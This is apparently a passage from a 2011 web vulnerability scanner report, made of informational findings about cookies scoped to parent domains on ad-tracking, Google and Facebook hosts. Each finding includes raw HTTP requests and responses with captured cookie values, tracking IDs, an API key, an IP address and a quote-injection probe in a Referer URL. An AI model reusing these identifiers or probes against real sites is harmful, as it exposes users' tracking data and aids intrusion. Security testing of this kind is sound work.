rsi_us_1000000=pUMdIz+j8AcU1C3EwLf6K/JvE2KDo6PfhEUKOic5AFeGN29ElLoI5qcC24O5l693kcybp3YbhLd9/YAOhsul0PE+Dh8nRW7l3xo6Ukv+5EjPSKUdov7vgbyf7cVBVEieI8ERFfZhPhDvpfDIia7KIDnhgVMY7SgWFj6HqsbuM56WGcHsyKE38Hx9Sm98uMWQF9dnsix8gbeSI+UmM20XdmCO1T5iSOGF+xsRE/G92UyZC3yhH8TYizNhEvJkLnAxFid1SqN4xUheUWSK0jPiHSnQ+WbAqNtXP+8cRy1ybSn7Ngk1ueHGim7fNM6foEWqdcCxYS+34Icb+5t0D6Nyg7jf1Sv65zticAkrDmR/cuZFLvFg/BrZC47V6nJNqthhCibZMZWALhXDLhoArpfc6lic7zclFnPskmP/vVJajPkwArw/AXp5inP9j3JWhQI7BsAZ8ykMpbkTLls51/KjwPgTLJlNU/l0jRUNLDIviUTVX0oS9v1OQCiQudLP4sPygpGGPPzJBbzOwBtxUU4YrtFGmwSd4FBfh2mRafVaS9EDgANbe39tHHc3bb98ApWWYQWvxsFpMB5vA6broSows6pOAeuPIXNf5hxAXvPAeJu04VBkn9vjcnpeedu7RUgve8SAFVDZmdgwl5kXG4fO/gf0UpYMar6ZFnRXsUFBWdrSUEh8jCRm4eiegPNbrxrxQqo1l6YrEmxIUGSakuHVzKI6km/o66HsmxCGWo5MYXmdfFkvmrtxCzagDy/fIMMnCvFNp7y1kCisCY2g7FeSMC0GC/ZMWN0R0D0Y+waHlaByglfZv87/DK/SHue/9L0cUBdagNty+3JbLheuS/BXWwk4iJE7MX7vExeH0D97ZxK52F1W2DIRvjzHvDxHVq1BQuHQT+SmPSMqOqsiqN3UfvYr4LoDiIUvQOfxMoDOQ/CFTL1hfAJWYacuqfQjMRwODomdQ2DXeRt83dbSQnBjLtw1hkQDknrycEqNfLg31kDpYvJOwf+SAbMKIdWIJX2S2PV/GcnNjshNHLPZZX0yK2J5vnAynAq4yp7TRMWexhN/Mmvqag1RLzJrNSOGN1bakiS6FSQJpuQLIBGspx+punnrkWal9XSIBusUXP8AEcf1yGM7s2izhk6/6kNVG8BK6BW7VO7G5Wo/CY/q3cTknpX43LcTnWBHfU9Gad1rt++O0gzfTZT88bg4ogjHcKaEN1qOoym6de+Iuj0TrAoU9nX5Pz6kyG/ayesPbEXigte/9jVaNwNL3STj/QzqaTcbXD7mNFD8We0/zA5zoCTvN1kreOzhHEadQemkTTPn7bZ0JVlrjPlvsmLFMj+4CMoSrQ0t0Y2S8A==; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:43:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=02955E68485FFD26D46A597F179CA232&rsi_site=A3654E9B7A083A26462C01CFD44FE48E&rsi_event=81EC054A9C1F3214A6EAFCF89323ACAD HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=0105974ea67d21e1&F08747&0&4d6e5e16&0&&4d4637e7&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d6e5f77&0&&4d464cb2&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsNUvMS5jJgE8Efe6cA/gU+BBsKjEeIf8lOISRcnGovHI6UEjSeeH4ygDZPpq3+/yS+PtxMQT7DslgE+EiBMcIdm+Gd/vQ8HMUGpOgSK+Iiy2dQ4mJ3SoQqTJ6fQVFiTZ9oRHyAn8YGRiYSjj2Ay1aQ3fE6vV5I9utDq0gdZ4/kVrRmNIOysji0Wn6/0LxbFbkxJUqn7AWIp2smXVCwMrSCX++R6vBtN664sMTvtNTbZXz0uM3sNWkLQhYlIi7SQwWY0rkMmj7vgY8B8gTBxg4wiG6w5j1DmzvVr4tx5DmkYz2wgpi9jyFX3BxNhVvlXHFNzBu4s3pRGxzkoYSZsG7tdLNgzEqBJPubDyRn4Xf+c3859kMdk7ghrTmCS2c/r6TbGtxpUM45NaHIbEK6+Cm0jFU0ivCzVPvaGdh9z3gjy1aXP5qVqL4CpwQgO4GiR/u5Ro5/TlTA==; rsi_segs_1000000=pUPFeU+FbxIQlVNYvPseIeEiFPKES2rX32SxfaDo4ZtI52+8kOrN2tIEatD2NFDN28McViXNICYwA3URtRQyHBfvW63RgQEvN3nTlHdbuK0MtbbnRNLsfPWlzdt7bBgxNo9S4ekQFKVzWiMHf/qOY/QXNYa+cLbu/9VZ8kRAQYWrhsJ+HLJ+yqOn8V4GEDQj/JldvKgki2EQ3w31l1DXzYDe9FQn0rxNrHq1JcpEh3un35yjZC9pStvAXS+WzCcUrLD4wAtiq9yiIYXVOZ0RybGj2Gcwxe3ACA==; udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFB8nFm9ZoBpa581Wgh7Ts5Rm/ap8Mkb9Q+GVTu54epWAGkuIcUzEvjCeu/cWf6M2Y8MG92YDcgNphCc2nnbm6XYDBWZvQrdTfnImZvD//pU9hrkq3bv86KSQiM5G9RudmpysjBB6Uxij3tV7f905NiBwZzxB2kkSvN5YbpKh6ZsFvakr0rEKYNchfYKxs81uUsvWv2v25y/tDzKUbsifk6vQ2nvJ6ImpmA/5NGPJxY5IpXCSIvzhTCDVwuiaID88hEcB3jF4k5YbL0qzpy62M8IhWYAygX0/s33p5EnmiUkFloNtJXzpQogyVM/dhl4Guto+qFj6bc0xOpx/YyjKv2KnCnCmShbqqgnULzYQyjlJqcnzNgKszAnm5AzRgHCwcoF9PxULrFHRjeh0XareOrKfQRqhQLp8ecNZJ7Dca5lClAA7kJRBpe+Va4SqcotI3ftcwzWbF3/RVKyIrzZpgmH5EZSRXp266vDYzzzsgP+MbUOBehZsCRlEuFEWxvlbYtStGrLtpugJtinLSHDY12rxJK5ba2DNcdMvkjX9u03FRxkHRpneE0MEkfCdQqLf3rEbe4LGbnJylb5d6BOhz+I7rfqIKtgMBHyOdoa3He8te+nNg8Le4bqBp7KnAbUABcOudoFrsRKYS+EiiU5zEL/0X6VS47Z58OgKOFKIeyo6shRmEuRscoXQArzUUcxRvOyeagPEQUDGP2Oj+70rit9bjcyjwPsMZaA32N2vxThPC2tH2Pi9XbNK36Vb4VRYuBvHfWhwfmiOlaP6IAr7jnzPBYCinNSy/sPrqi5SfeYBhKre5NLw0dMBum/gLFe/+/EwcENmxjJae/M8L/7ypIk00ObJN7WLFC9H0wncnPMNsre9wng3+O+sMICU5gtuOoO8pn6N5UpDVPTzwhNDJVYLbjnI75a+jexed6Ky9PBS//sjmvosnVlogPhPYuaRy7mKtOd4M45hgsuL5ZFU050Q5QgPUaU+yVbhWpuUOCs8dHz4uEo/8LLwMEFo0u1k3NOWh4k9EDkuGDPBCFimPorFKFp9+lj5thKGyw4nDfh/Z1Lzv27bbMHDhcdW16iaIp7Da617pHmu6/AzI95UtDKEogVjqdkc3arBcYGO8qDEdoGQ2BcMj5JAu8rxQg1tfMSfScdtt/e2yVh7lbt6O1cg38e7wC05yAqNb7SukJxUjILkHITxyR+hvkZT+Lw5WDVFpSb1J5Nt9gPggiXg==

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_us_1000000=pUMdIz+j8AcU1C3EwLf6K/JvE2KDo6PfhEUKOic5AFeGN29ElLoI5qcC24O5l693kcybp3YbhLd9/YAOhsul0PE+Dh8nRW7l3xo6Ukv+5EjPSKUdov7vgbyf7cVBVEieI8ERFfZhPhDvpfDIia7KIDnhgVMY7SgWFj6HqsbuM56WGcHsyKE38Hx9Sm98uMWQF9dnsix8gbeSI+UmM20XdmCO1T5iSOGF+xsRE/G92UyZC3yhH8TYizNhEvJkLnAxFid1SqN4xUheUWSK0jPiHSnQ+WbAqNtXP+8cRy1ybSn7Ngk1ueHGim7fNM6foEWqdcCxYS+34Icb+5t0D6Nyg7jf1Sv65zticAkrDmR/cuZFLvFg/BrZC47V6nJNqthhCibZMZWALhXDLhoArpfc6lic7zclFnPskmP/vVJajPkwArw/AXp5inP9j3JWhQI7BsAZ8ykMpbkTLls51/KjwPgTLJlNU/l0jRUNLDIviUTVX0oS9v1OQCiQudLP4sPygpGGPPzJBbzOwBtxUU4YrtFGmwSd4FBfh2mRafVaS9EDgANbe39tHHc3bb98ApWWYQWvxsFpMB5vA6broSows6pOAeuPIXNf5hxAXvPAeJu04VBkn9vjcnpeedu7RUgve8SAFVDZmdgwl5kXG4fO/gf0UpYMar6ZFnRXsUFBWdrSUEh8jCRm4eiegPNbrxrxQqo1l6YrEmxIUGSakuHVzKI6km/o66HsmxCGWo5MYXmdfFkvmrtxCzagDy/fIMMnCvFNp7y1kCisCY2g7FeSMC0GC/ZMWN0R0D0Y+waHlaByglfZv87/DK/SHue/9L0cUBdagNty+3JbLheuS/BXWwk4iJE7MX7vExeH0D97ZxK52F1W2DIRvjzHvDxHVq1BQuHQT+SmPSMqOqsiqN3UfvYr4LoDiIUvQOfxMoDOQ/CFTL1hfAJWYacuqfQjMRwODomdQ2DXeRt83dbSQnBjLtw1hkQDknrycEqNfLg31kDpYvJOwf+SAbMKIdWIJX2S2PV/GcnNjshNHLPZZX0yK2J5vnAynAq4yp7TRMWexhN/Mmvqag1RLzJrNSOGN1bakiS6FSQJpuQLIBGspx+punnrkWal9XSIBusUXP8AEcf1yGM7s2izhk6/6kNVG8BK6BW7VO7G5Wo/CY/q3cTknpX43LcTnWBHfU9Gad1rt++O0gzfTZT88bg4ogjHcKaEN1qOoym6de+Iuj0TrAoU9nX5Pz6kyG/ayesPbEXigte/9jVaNwNL3STj/QzqaTcbXD7mNFD8We0/zA5zoCTvN1kreOzhHEadQemkTTPn7bZ0JVlrjPlvsmLFMj+4CMoSrQ0t0Y2S8A==; Domain=.revsci.net; Expires=Sun, 25-Jan-2043 15:43:34 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1014926&t=2
Content-Length: 0
Date: Wed, 02 Feb 2011 15:43:34 GMT

11.31. https://adwords.google.com/select/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/select/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

S=awfe=mVgud44jaJvxFuazOacOqg:awfe-efe=mVgud44jaJvxFuazOacOqg; Domain=.google.com; Path=/; Secure; HttpOnly
S_awfe=JgJL9W95vAy5LAeZHxbzdA; Domain=.google.com; Path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=o9nz4S0BAAA=.9QCH/JbBItRG1yn60m2UCA==.mkxA2np1pptZymO30cJJ6A==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=mVgud44jaJvxFuazOacOqg:awfe-efe=mVgud44jaJvxFuazOacOqg; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=JgJL9W95vAy5LAeZHxbzdA; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Tue, 01 Feb 2011 15:30:10 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

11.32. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347&callback=Demdex.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://fast.dm.demdex.net/dm-dest.html?bizo=1&bizovalidttl=7&
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KbEYt9Gm0axhaj5XcunNcMDa7Re6IGD4lDrbCisip76D66Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRXq0x1X4kUBB3CBHNXcl3bEVUJBxdqAyDalXCEoKjwKKB7uI3cisSEIeS2mCWkomhIipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 02 Feb 2011 15:11:22 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 165
Connection: keep-alive

Demdex.parseBizo({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

11.33. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Thu, 31-Jan-2013 14:28:14 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6036297&rn=974371644&c7=http%3A%2F%2Fwww.montanaplates.com%2F880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html&c3=12345678&c8=Twitter%20Tweets%20about%20Llc%20as%20of%20January%2020%2C%20201&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 01 Feb 2011 14:28:14 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Thu, 31-Jan-2013 14:28:14 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

11.34. http://blog.facebook.com/blog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.facebook.com
Path:	/blog.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=Fq5JTSw9c381ZCmsmGv_p6Xn; expires=Fri, 01-Feb-2013 19:18:46 GMT; path=/; domain=.facebook.com; httponly
lsd=i0PHb; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fblog.facebook.com%2Fblog.php%3Fpost%3D382978412130; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fblog.facebook.com%2Fblog.php%3Fpost%3D382978412130; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog.php?post=382978412130 HTTP/1.1
Host: blog.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.35. http://blogsearch.google.com/blogsearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogsearch.google.com
Path:	/blogsearch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=263368eebf0d7848:TM=1296574229:LM=1296574229:S=vumEZ771Y5jhBMr7; expires=Thu, 31-Jan-2013 15:30:29 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blogsearch HTTP/1.1
Host: blogsearch.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:29 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=263368eebf0d7848:TM=1296574229:LM=1296574229:S=vumEZ771Y5jhBMr7; expires=Thu, 31-Jan-2013 15:30:29 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: bsfe
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users
...[SNIP]...

11.36. http://books.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=4abc8d19f12bc81a:TM=1296574232:LM=1296574232:S=ngidMyE0rUGptvZ6; expires=Thu, 31-Jan-2013 15:30:32 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:32 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=4abc8d19f12bc81a:TM=1296574232:LM=1296574232:S=ngidMyE0rUGptvZ6; expires=Thu, 31-Jan-2013 15:30:32 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

11.37. http://books.google.com/books previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://books.google.com
Path:	/books

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=0c90630420770629:TM=1296574231:LM=1296574231:S=mhwvdWjwMbFHKvE5; expires=Thu, 31-Jan-2013 15:30:31 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /books HTTP/1.1
Host: books.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:30:31 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=0c90630420770629:TM=1296574231:LM=1296574231:S=mhwvdWjwMbFHKvE5; expires=Thu, 31-Jan-2013 15:30:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: OFE/0.1
Connection: close

<!DOCTYPE html><html><head><script>(function(){function a(d){this.t={};this.tick=function(e,f,b){b=b?b:(new Date).getTime();this.t[e]=[b,f]};this.tick("start",null,d)}var c=new a;window.jstiming={Time
...[SNIP]...

11.38. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ActivityInfo=000p81bBo%5f; expires=Tue, 03-May-2011 10:43:37 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Tue, 03-May-2011 10:43:37 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=96597&rnd=909797.7089695632 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
